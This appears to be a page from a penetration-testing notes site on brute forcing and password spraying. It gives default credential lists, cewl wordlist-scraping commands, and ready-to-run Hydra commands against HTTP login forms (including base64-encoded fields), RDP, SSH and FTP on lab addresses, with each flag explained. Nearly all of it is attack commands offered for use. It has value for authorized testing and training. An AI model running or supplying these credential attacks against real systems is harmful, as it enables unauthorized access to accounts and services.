Brute Forcing and Spraying

Common Usernames

root
admin
administrator

Common Passwords

admin
root
toor
password
Username:Username     <--- upercase first letter
username:username     <--- lowercase first letter
AppName:AppName       <--- Test upper and lower

Scrape website for potential passwords

cewl <url>
cewl --lower <url>
cewl --upper <url>

Test uppercase and lowercase

Hydra

Example 1

Capture in Burp

Username and Password converted to base64 upon sending
Error code 403 = failed

hydra -I -f -L usernames.txt -P passwords.txt 'http-post-form://192.168.165.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403'

hydra -I -vV -f -L users.txt -P passwords.txt 'http-post-form://192.168.165.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403'

I - ignore restore files
vV - verbose mode
f - stop upon success
L - username list
P - password list
^USER64^ ^PASS64^ - placements for username and password + base64 encode
C=/ - establish session cookies at the URL
F=403 - HTTP 403 means invalid login

Example 2

hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 
http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"

hydra -l admin -P ~/rockyou.txt http-get://192.168.178.201 -vV

Other services

hydra -vV -L names.txt -p 'SuperS3cure1337#' 192.168.178.202 rdp -t 10
hydra -vV -l itadmin -P ~/rockyou.txt 192.168.178.202 -t 10 ssh
hydra -vV -l itadmin -P ~/rockyou.txt 192.168.178.202 -t 10 ftp

PreviousSource Code NextPayloads

Last updated 1 year ago

Hydra

Login Portals

Example 1

Example 2

Other services